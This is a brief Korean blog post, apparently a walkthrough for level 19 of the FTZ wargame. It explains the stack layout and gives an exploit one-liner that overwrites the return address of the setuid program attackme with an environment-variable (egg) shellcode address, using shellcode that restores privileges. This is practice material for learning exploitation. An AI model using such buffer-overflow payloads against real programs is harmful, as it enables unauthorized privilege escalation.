▲ level19의 힌트. 이번엔 너무 간단해서 더 놀랐다. 하지만 이전 문제들과 달리 권한 설정 부분이 없다. EGG Shell공격 기법을 이용하되 이전까지 사용한 쉘코드가 아닌 권한 설정 함수가 포함되어 있는 쉘코드를 사용하면 된다.
▲ 메모리는 할당 40 + SFP(이전EBP) + RET 구조를 가지게 된다. 따라서 NOP*44 + 환경변수 주소 를 입력해주면 된다.
▲ EGG라는 환경변수 등록 후 환경변수 주소 확인
▲ python -c 'print "\x90"*44+"\x8a\xfc\xff\xbf"';cat)|./attackme
'System > FTZ' 카테고리의 다른 글
| [FTZ school] level 18 (0) | 2019.03.19 |
|---|---|
| [FTZ school] level 17 (0) | 2019.03.19 |
| [FTZ school] level 16 (0) | 2019.03.19 |
| [FTZ school] level 15 (0) | 2019.03.19 |
| [FTZ school] level 14 (0) | 2019.03.19 |
